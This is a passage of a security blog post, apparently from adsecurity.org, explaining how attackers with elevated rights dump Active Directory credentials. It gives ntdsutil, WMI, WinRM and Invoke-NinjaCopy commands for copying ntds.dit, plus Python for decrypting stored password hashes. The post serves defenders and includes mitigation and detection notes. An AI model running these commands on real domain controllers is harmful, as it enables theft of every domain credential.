{"id":2398,"date":"2016-01-03T11:13:14","date_gmt":"2016-01-03T16:13:14","guid":{"rendered":"https:\/\/adsecurity.org\/?p=2398"},"modified":"2016-05-06T10:40:03","modified_gmt":"2016-05-06T14:40:03","slug":"how-attackers-dump-active-directory-database-credentials","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=2398","title":{"rendered":"How Attackers Dump Active Directory Database Credentials"},"content":{"rendered":"<p>I previously posted some information on dumping AD database credentials before in a couple of posts: &#8220;<a href=\"https:\/\/adsecurity.org\/?p=451\">How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller<\/a>&#8221; and &#8220;<a href=\"https:\/\/adsecurity.org\/?p=2362\">Attack Methods for Gaining Domain Admin Rights in Active Directory<\/a>&#8220;.<\/p>\n<p>This post covers many different ways that an attacker can dump credentials from Active Directory, both locally on the DC and remotely. Some of this information <a href=\"https:\/\/adsecurity.org\/?page_id=1352\">I spoke about at several security conferences in 2015 (BSides, Shakacon, Black Hat, DEF CON, &amp; DerbyCon)<\/a>.<\/p>\n<p>The primary techniques for dumping credentials from Active Directory involve <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">interacting with LSASS on a live DC<\/a>, grabbing a copy of the AD datafile (ntds.dit), or <a href=\"https:\/\/adsecurity.org\/?p=1729\">tricking a Domain Controller into replicating password data to the attacker<\/a> (&#8220;I&#8217;m a Domain Controller!&#8221;).<br \/>\nThe methods covered here require elevated rights since they involve connecting to the Domain Controller to dump credentials.<br \/>\nThey are:<\/p>\n<ul>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#CreateIFM\">Grabbing the ntds.dit file locally on the DC using NTDSUtil&#8217;s Create IFM<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#WMIVSS\">Pulling the ntds.dit remotely using VSS shadow copy<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#InvokeNinjaCopy\">Pulling the ntds.dit remotely using PowerSploit&#8217;s Invoke-NinjaCopy (requires PowerShell remoting is enabled on target DC).<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#MimikatzLocal\">Dumping Active Directory credentials locally using Mimikatz (on the DC).<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#InvokeMimikatzLocal\">Dumping Active Directory credentials locally using Invoke-Mimikatz (on the DC).<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#InvokeMimikatzRemote\">Dumping Active Directory credentials remotely using Invoke-Mimikatz.<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2398#MimikatzDCSync\">Dumping Active Directory credentials remotely using Mimikatz&#8217;s DCSync.<\/a><\/li>\n<\/ul>\n<p>Note that if a copy of the Active Directory database (ntds.dit) is discovered, the attacker <a href=\"https:\/\/adsecurity.org\/?p=2362\">could dump credentials from it without elevated rights<\/a>.<br \/>\nThe last topic on this page shows how to extract credentials from a captured ntds.dit file (with regsitry export).<\/p>\n<p><strong>Remote Code Execution Options<br \/>\n<\/strong><\/p>\n<p>There are several different ways to execute commands remotely on a Domain Controller, assuming they are executed with the appropriate rights. The most reliable remote execution methods involve either PowerShell (leverages WinRM) or WMI.<\/p>\n<ul>\n<li><b>WMI<\/b><br \/>\n<i>Wmic \/<\/i><i>node:COMPUTER<\/i><i>\/<\/i><i>user:DOMAIN<\/i><i>\\USER \/<\/i><i>password:PASSWORD<\/i><i> process call create &#8220;COMMAND\u201c<\/i><\/li>\n<li><b>PowerShell (WMI)<\/b><br \/>\n<i>Invoke-<\/i><i>WMIMethod<\/i><i> -Class Win32_Process -Name Create &#8211;<\/i><i>ArgumentList<\/i><i> $COMMAND &#8211;<\/i><i>ComputerName<\/i><i> $COMPUTER -Credential $CRED<br \/>\n<\/i><\/li>\n<li><b>WinRM<\/b><br \/>\n<i>winrs<\/i><i> &#8211;<\/i><i>r:COMPUTER<\/i><i> COMMAND<\/i><\/li>\n<li><b>PowerShell Remoting<\/b><br \/>\n<i>Invoke-Command &#8211;<\/i><i>computername<\/i><i> $COMPUTER -command { $COMMAND}<br \/>\n<\/i><i>New-<\/i><i>PSSession<\/i> <i>-Name PSCOMPUTER &#8211;<\/i><i>ComputerName<\/i><i> $COMPUTER; Enter-<\/i><i>PSSession<\/i><i> -Name PSCOMPUTER<\/i><\/li>\n<\/ul>\n<p><!--more--><\/p>\n<p><strong><br \/>\nThe Active Directory Database (ntds.dit)<\/strong><\/p>\n<p>The Active Directory domain database is stored in the <a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc961761.aspx\">ntds.dit file<\/a> (stored in c:\\Windows\\NTDS by default, but often on a different logical drive). The AD database is a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Microsoft_Jet_Database_Engine\">Jet database engine<\/a> which uses the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Extensible_Storage_Engine\">Extensible Storage Engine (ESE)<\/a> which provides data storage and indexing services; ESE level indexing enables object attributes to be quickly located. ESE ensures the database complies with <a href=\"https:\/\/en.wikipedia.org\/wiki\/ACID\">ACID <\/a>(Atomic, Consistent, Isolated, and Durable) &#8211; all operations in a transaction complete or none do. The AD ESE database is very fast and reliable.<\/p>\n<p><img decoding=\"async\" id=\"28ea3c89-173b-4044-a30a-4b9b0b816163\" title=\"Data Store Architecture\" src=\"https:\/\/i-technet.sec.s-msft.com\/dynimg\/IC195573.gif\" alt=\"Data Store Architecture\" \/><\/p>\n<p>Note: Microsoft also uses the Jet database for Exchange mailbox databases.<\/p>\n<p>Active Directory <a href=\"http:\/\/blogs.technet.com\/b\/ad\/archive\/2008\/07\/11\/loading-the-active-directory-database-into-ram.aspx\">loads parts of the ntds.dit file in (LSASS protected) memory<\/a> with the caching based on LRU-K algorithm ensuring most frequently accessed data is in memory, for increased performance, thus improving read performance the second time. Database changes are performed in memory, written to the transaction log, and then there&#8217;s a lazy commit to the database file later.The checkpoint file (edb.chk) keeps track of transactions written to this point.<\/p>\n<p>The &#8220;<a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc772829(v=ws.10).aspx\">version store<\/a>&#8221; is a copy of an object&#8217;s instance while the data is being read from memory which enables updates to be performed without changing the read-data (ESE transactional view). Once the read operation completes, that instance of the version store ends.<\/p>\n<p>While Active Directory is comprised of <a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc961591.aspx\">three directory partitions, Domain, Configuration, and Schema<\/a>, this is simply an abstracted view of the database data. <a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/cc772829(v=ws.10).aspx\">The ntds.dit file is comprised of three main tables: Data Table, Link Table, and the SD Table<\/a>.<\/p>\n<blockquote>\n<h5 class=\"subHeading\">Data Table<\/h5>\n<div class=\"subSection\">\n<p>The data table contains all the information in the Active\u00a0Directory data store: users, groups, application-specific data, and any other data that is stored in Active Directory after its installation. The data table can be thought of as having rows (each representing an instance of an object, such as a user) and columns (each representing an attribute in the schema, such as <strong>GivenName<\/strong>). For each attribute in the schema, the table contains a column, called a field. Field sizes can be fixedor variable. Fixed-size fields contain an integer or long integer as the data type. Variable-size fields typically hold string types, for example, Unicode strings. The database allocates only as much space as a variable-size field needs: 16\u00a0bits for a 1-character Unicode string, 160\u00a0bits for a 10-character Unicode string, and so on.<\/p>\n<p>The database space that is used to store an object depends on the number of attributes for which values are set and the size of the values. For example, if the administrator creates two user objects (User1 and User2), sets only the minimum attributes on them, and then later adds a 10-character description to User2, the User2 space is approximately 80\u00a0bytes bigger than the User1 space (20\u00a0bytes for the 10\u00a0characters, plus metadata on the newly generated attribute).<\/p>\n<p>Database records cannot span database pages; therefore, each object is limited to 8\u00a0kilobytes (KB). However, some attribute values of an object do not count fully against this limit. Long, variable-length values can be stored on a different page than the object record, leaving behind only a 9-byte reference. In this way, an object and all its attribute values can be much larger than 8\u00a0KB.<\/p>\n<\/div>\n<h5 class=\"subHeading\">Link Table<\/h5>\n<div class=\"subSection\">\n<p>The link table contains data that represents linked attributes, which contain values that refer to other objects in Active\u00a0Directory. An example is the <strong>MemberOf<\/strong> attribute on a user object, which contains values that reference groups to which the user belongs. The link table is much smaller than the data table.<\/p>\n<\/div>\n<h5 class=\"subHeading\">SD Table<\/h5>\n<div class=\"subSection\">\n<p>The SD Table contains data that represents inherited security descriptors for each object. With the introduction of the SD table in Windows\u00a0Server\u00a02003 or later, inherited security descriptors no longer have to be duplicated on each object that inherits security descriptors. Instead, inherited security descriptors are stored in the SD table and linked to the appropriate objects.<\/p>\n<\/div>\n<\/blockquote>\n<p>&nbsp;<\/p>\n<p>Password hash encryption used in Active Directory<\/p>\n<p>The definitive work on this seems to be a <a href=\"http:\/\/www.ntdsxtract.com\/downloads\/ActiveDirectoryOfflineHashDumpAndForensics.pdf\">whitepaper titled &#8220;Active Directory Offline Hash Dump and Forensic Analysis&#8221; written by Csaba Barta<\/a> (csaba.barta@gmail.com) written in July 2011.<\/p>\n<blockquote><p>Note, that in the previous list there are numerous fields that are described as encrypted. The purpose of this encryption is to provide protection against offline data extraction.<\/p>\n<p>The solution introduced by Microsoft in order to provide this protection is complex and composed of 3 layers of encryption of which 2 layers use RC4 and the third layer uses DES.<\/p>\n<p>In order to decrypt a hash stored in NTDS.DIT the following steps are necessary:<\/p>\n<p>1. decrypt the PEK (Password Encryption Key) with bootkey (RC4 &#8211; layer 1)<br \/>\n2. hash decryption first round (with PEK and RC4 &#8211; layer 2)<br \/>\n3. hash decryption second round (DES &#8211; layer 3)<\/p>\n<p><strong>Password Encryption Key<\/strong><br \/>\nThe PEK or Password Encryption Key is used to encrypt data stored in NTDS.DIT. This key is the same across the whole domain, which means that it is the same on all the domain controllers. The PEK itself is also stored in the NTDS.DIT in an encrypted form. In order to decrypt it one will need the registry (the SYSTEM hive) from the same domain controller where NDTS.DIT file was obtained. This is because the PEK is encrypted with the BOOTKEY which is different on all domain controllers (and in fact on all computers in the domain).<\/p>\n<p>In order to decrypt the PEK one will have to obtain the ATTk590689 field from the NTDS.DIT. As it was mentioned all the objects stored in the database will have this field. In order to determine which one is needed one has to check whether the value is null or not.<\/p>\n<p>The length of the value is 76 bytes (it is stored as binary data). The structure of the value is the following:<br \/>\nheader 8 bytes key material for RC4 16 bytes encrypted PEK 52 bytes<\/p>\n<p>After decryption the value of the decrypted PEK can also be divided into 2 parts. One will have to skip the first 36 bytes (so the length of the actual PEK key is 16 bytes).<\/p>\n<p>Here is the python algorithm that can be used to decrypt the PEK key after one has obtained the bootkey (bootkey can be collected from the SYSTEM registry hive and the method is well documented &#8211; http:\/\/moyix.blogspot.com\/2008\/02\/syskey-and-sam.html):<br \/>\n<em>md5=MD5.new()<br \/>\nmd5.update(bootkey)<br \/>\nfor i in range(1000):<br \/>\nmd5.update(enc_pek[0:16])<br \/>\nrc4_key=md5.digest();<br \/>\nrc4 = ARC4.new(rc4_key)<br \/>\npek=rc4.encrypt(enc_pek[16:])<br \/>\nreturn pek[36:]<\/em><\/p>\n<p>As one can see there is an MD5 hashing part of the decryption with 1000 rounds. This is for making the bruteforce attack against the key more time consuming.<\/p>\n<p><strong>Password Hash Decryption<\/strong><br \/>\nNow that the PEK is decrypted the next task is decrypt the hashes stored in the ATTk589879 (encrypted LM hash) and ATTk589914 (encrypted NT hash) attributes of user objects.<\/p>\n<p>The first step is to remove the RC4 encryption layer. During this the PEK key and the first 16 bytes of the encrypted hash is used as key material for the RC4 cypher. Below is the structure of the 40 bytes long encrypted hash value stored in the NTDS.DIT database.<br \/>\nheader 8 bytes key material for RC4 16 bytes encrypted hash 16 bytes<\/p>\n<p>The algorithm to remove the RC4 encryption layer is the following:<br \/>\n<em>md5 = MD5.new()<\/em><br \/>\n<em> md5.update(pek)<\/em><br \/>\n<em> md5.update(enc_hash[0:16])<\/em><br \/>\n<em> rc4_key = md5.digest();<\/em><br \/>\n<em>rc4 = ARC4.new(rc4_key)<\/em><br \/>\n<em> denc_hash = rc4.encrypt(enc_hash[16:])<\/em><\/p>\n<p>The final step is to remove the DES encryption layer which is in fact very similar to the so called \u201cstandard\u201d SYSKEY encryption used in case of password hashes stored in the registry (details of the algorithm can be found here &#8211; http:\/\/moyix.blogspot.com\/2008\/02\/syskey-andsam.html).<\/p>\n<p>Below is the last part of the algorithm:<br \/>\n<em>(des_k1,des_k2) = sid_to_key(rid)<\/em><br \/>\n<em> d1 = DES.new(des_k1, DES.MODE_ECB)<\/em><br \/>\n<em> d2 = DES.new(des_k2, DES.MODE_ECB)<\/em><br \/>\n<em> hash = d1.decrypt(denc_hash[:8]) + d2.decrypt(denc_hash[8:])<\/em><\/p>\n<p>Notice, that it is essential to have the SID of the user in order to determine the RID and to compute the keys used for DES.<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>The best (and really, only) mitigation is to prevent attackers from gaining access to a Domain Controller and associated files. Protecting admin credentials is covered in the post &#8220;<a href=\"https:\/\/adsecurity.org\/?p=2362\">Attack Methods for Gaining Domain Admin Rights in Active Directory<\/a>&#8220;.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<h4><strong>Pulling the ntds.dit remotely using VSS shadow copy (over WMI or PowerShell Remoting)<br \/>\n<\/strong><\/h4>\n<p>Windows has a built-in management component called <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/aa394582%28v=vs.85%29.aspx\">WMI <\/a>that enables remote execution (admin rights required). WMIC is the WMI command tool to execute commands on remote computers.<\/p>\n<p>Matt Graeber presented on leveraging WMI for offensive purposes at Black Hat USA 2015 (<a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf\">paper<\/a>, <a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf\">slides<\/a>, and <a href=\"https:\/\/www.youtube.com\/watch?v=pqth74Uzxy4\">video<\/a>). Matt also spoke at DEF CON 23 (<a href=\"https:\/\/www.youtube.com\/watch?v=xBd6p-Lz3kE\">video<\/a>) with colleagues and dove further into offensive WMI capability (and again at DerbyCon &#8211; <a href=\"https:\/\/www.youtube.com\/watch?v=3UZ3Afm5hO4\">video<\/a>)<\/p>\n<p>Leverage WMIC (or PowerShell remoting) to Create (or copy existing) VSS.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin.png\" rel=\"attachment wp-att-2403\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2403\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin.png\" alt=\"WMIC-PowerShell-Execute-VSSAdmin\" width=\"963\" height=\"129\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin.png 963w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin-300x40.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin-768x103.png 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Execute-VSSAdmin-960x129.png 960w\" sizes=\"auto, (max-width: 963px) 100vw, 963px\" \/><\/a><\/p>\n<p>Once the VSS snapshot has completed, we then copy the NTDS.dit file and the System registry hive out of the VSS to the c: drive on the DC.<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file.png\" rel=\"attachment wp-att-2402\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2402\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file.png\" alt=\"WMIC-PowerShell-Copy-ntdsdit-file\" width=\"962\" height=\"127\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file.png 962w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file-300x40.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file-768x101.png 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-ntdsdit-file-960x127.png 960w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/a><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive.png\" rel=\"attachment wp-att-2401\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2401\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive.png\" alt=\"WMIC-PowerShell-Copy-system-registryhive\" width=\"962\" height=\"140\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive.png 962w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive-300x44.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive-768x112.png 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-system-registryhive-960x140.png 960w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/a><\/p>\n<p>After the files are in the c:\\temp folder on the DC, we copy the files to local computer.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local.png\" rel=\"attachment wp-att-2400\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2400\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local.png\" alt=\"WMIC-PowerShell-Copy-files-from-DC-to-local\" width=\"594\" height=\"29\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local.png 594w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PowerShell-Copy-files-from-DC-to-local-300x15.png 300w\" sizes=\"auto, (max-width: 594px) 100vw, 594px\" \/><\/a><\/p>\n<p>This screenshot shows the attacker used the clear text password discovered earlier using <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a>. What if we don\u2019t have that?<\/p>\n<p>The attacker can pass a Kerberos ticket with WMIC to do the same thing.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02.png\" rel=\"attachment wp-att-2404\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2404\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02.png\" alt=\"WMIC-PTT-Execute-VSSAdmin-02\" width=\"796\" height=\"126\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02.png 796w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02-300x47.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-02-768x122.png 768w\" sizes=\"auto, (max-width: 796px) 100vw, 796px\" \/><\/a> <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin.png\" rel=\"attachment wp-att-2405\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2405\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin.png\" alt=\"WMIC-PTT-Execute-VSSAdmin\" width=\"770\" height=\"126\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin.png 770w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-300x49.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/WMIC-PTT-Execute-VSSAdmin-768x126.png 768w\" sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/a><\/p>\n<p>Note that<a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/hh831568.aspx\"> with newer versions of Windows, WMIC is deprectated<\/a>. PowerShell provides the same functionality with the <i>Invoke-<\/i><i>WMIMethod<\/i> <em>cmdlet<\/em>.<br \/>\n<a id=\"CreateIFM\"><\/a><\/p>\n<h4><strong>Pulling the ntds.dit locally on the DC using NTDSUTIL&#8217;s IFM Creation (VSS shadow copy)<\/strong><\/h4>\n<p>NTDSUtil is the command utility for natively working with the AD DB (ntds.dit) &amp; enables IFM set creation for DCPromo. IFM is used with DCPromo to \u201cInstall From Media\u201d so the server being promoted doesn\u2019t need to copy domain data over the network from another DC.<\/p>\n<p><em>ntdsutil &#8220;ac i ntds&#8221; &#8220;ifm&#8221; &#8220;create full c:\\temp&#8221; q q<\/em><\/p>\n<p>The IFM set is a copy of the NTDS.dit file created in the screenshot below in c:\\temp.<br \/>\nWhen creating an IFM, a VSS snapshot is taken, mounted, and the ntds.dit file and associated data is copied out of it into the target folder.<\/p>\n<p>This file may be staged on a share for promoting new DCs or it may be found on a new server that has not been promoted yet. This server may not be properly secured and the IFM data, including the NTDS.dit file copied and the credential data extracted.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM.png\" rel=\"attachment wp-att-2366\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2366\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM.png\" alt=\"NTDSUtil-CreateIFM\" width=\"634\" height=\"313\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM.png 634w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/12\/NTDSUtil-CreateIFM-300x148.png 300w\" sizes=\"auto, (max-width: 634px) 100vw, 634px\" \/><\/a><\/p>\n<p><em><strong>This command can also be executed remotely via WMI or PowerShell.<\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n<h4><strong>Pulling the ntds.dit remotely using <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerSploit<\/a>&#8216;s Invoke-NinjaCopy (requires PowerShell remoting is enabled on target DC).<\/strong><\/h4>\n<p><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Invoke-NinjaCopy.ps1\">Invoke-NinaCopy<\/a> is a PowerShell function that can copy a file off of a remote computer (even if the file is locked, provides direct access to the file) leveraging PowerShell remoting (PowerShell remoting has to be enabled on the target DC).<\/p>\n<p><a href=\"http:\/\/blogs.technet.com\/b\/sysinternals\/archive\/2016\/01\/05\/update-sigcheck-v2-4-sysmon-v3-2-process-explorer-v16-1-autoruns-v13-51-accesschk-v6-01.aspx\">Sysmon v3.2 now includes detection of raw disk access which may provide detection of Invoke-NinjaCopy use<\/a>.<\/p>\n<blockquote><p><span class=\"message_body\">Sysmon v3.2 now detects raw data access like Invoke-NinjaCopy<br \/>\n&#8220;This release of Sysmon, a background service that logs security-relevant process and network activity to the Windows event log, now has the option of logging raw disk and volume accesses, operations commonly performed by malicious toolkits to read information by bypassing higher-level security features.<\/span><\/p><\/blockquote>\n<p>From the Invoke-NinjaCopy file synopsis:<\/p>\n<blockquote>\n<pre>This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires you\r\nare an administrator of the server. This allows you to bypass the following protections:\r\n    1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives\r\n    2. SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue)\r\n    3. Bypass DACL's, such as a DACL which only allows SYSTEM to open a file\r\n\r\nIf the LocalDestination param is specified, the file will be copied to the file path specified on the local server (the server the script is being run from).\r\nIf the RemoteDestination param is specified, the file will be copied to the file path specified on the remote server.\r\n\r\nThe script works by opening a read handle to the volume (which if logged, may stand out, but I don't think most people log this and other processes do it too).\r\nThe script then uses NTFS parsing code written by cyb70289 and posted to CodePlex to parse the NTFS structures. Since the NTFS parsing code is written\r\nin C++, I have compiled the code to a DLL and load it reflective in to PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below for a link\r\nto the original script).<\/pre>\n<\/blockquote>\n<p>Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) wrote the following on <a href=\"https:\/\/clymb3r.wordpress.com\/2013\/06\/13\/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks\/\">his blog about Invoke-NinjaCopy<\/a>:<\/p>\n<blockquote><p>Currently there are a few ways to dump Active Directory and local password hashes. Until recently, the techniques I had seen used to get the hashes either relied on injecting code in to LSASS or using the Volume Shadow Copy service to obtain copies of the files which contain the hashes. I have created a PowerShell script called Invoke-NinjaCopy that allows any file (including NTDS.dit) to be copied without starting suspicious services, injecting in to processes, or elevating to SYSTEM.<\/p><\/blockquote>\n<p>Command:<br \/>\n<em>Invoke-NinjaCopy -Path &#8220;c:\\windows\\ntds\\ntds.dit&#8221; -ComputerName &#8220;RDLABDC02&#8221; -LocalDestination &#8220;c:\\temp\\ntds.dit&#8221;<\/em><\/p>\n<p>This example executes Invoke-Ninjacopy from code downloaded from the Internet and executed entirely in memory. If the attacker compromised a workstation a Domain Admin logged onto, this scenario would work, enabling the attacker to copy the Active Directory database file from a Domain Controller to the workstation and then upload to the Internet.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02.jpg\" rel=\"attachment wp-att-2411\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2411\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02.jpg\" alt=\"InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02\" width=\"736\" height=\"133\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02.jpg 1203w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02-300x54.jpg 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02-768x139.jpg 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02-1024x185.jpg 1024w\" sizes=\"auto, (max-width: 736px) 100vw, 736px\" \/><\/a><\/p>\n<p>Using a <a href=\"https:\/\/github.com\/yosqueoy\/ditsnap\">DIT Snapshot Viewer<\/a>, we can validate that we got the ntds.dit file successfully.<br \/>\nI had to &#8220;take a snapshot&#8221; of the ntds.dit file to correct errors when grabbing the file from a running system.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB.jpg\" rel=\"attachment wp-att-2410\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2410\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB.jpg\" alt=\"DITSnapshotViewer-RDLAB\" width=\"805\" height=\"604\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB.jpg 805w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB-300x225.jpg 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB-768x576.jpg 768w\" sizes=\"auto, (max-width: 805px) 100vw, 805px\" \/><\/a><\/p>\n<p><span style=\"text-decoration: underline;\">Note:<\/span><br \/>\n<em>Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>), the author of <a href=\"https:\/\/clymb3r.wordpress.com\/2013\/06\/13\/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks\/\">Invoke-NinjaCopy<\/a>, noted that Invoke-NinjaCopy wasn&#8217;t tested on large ntds.dit files and therefore on a busy DC, copying the ntds.dit via Invoke-NinjaCopy may corrupt the file. <a href=\"http:\/\/www.harmj0y.net\/blog\/redteaming\/the-case-of-a-stubborn-ntds-dit\/\">Harmj0y has some insight on getting past NTDS.dit file corruption when attempting to dump AD credentials<\/a>.<br \/>\n<\/em><\/p>\n<p>&nbsp;<\/p>\n<h4><strong>Dumping Active Directory credentials locally using <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a> (on the DC).<\/strong><\/h4>\n<p>Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden 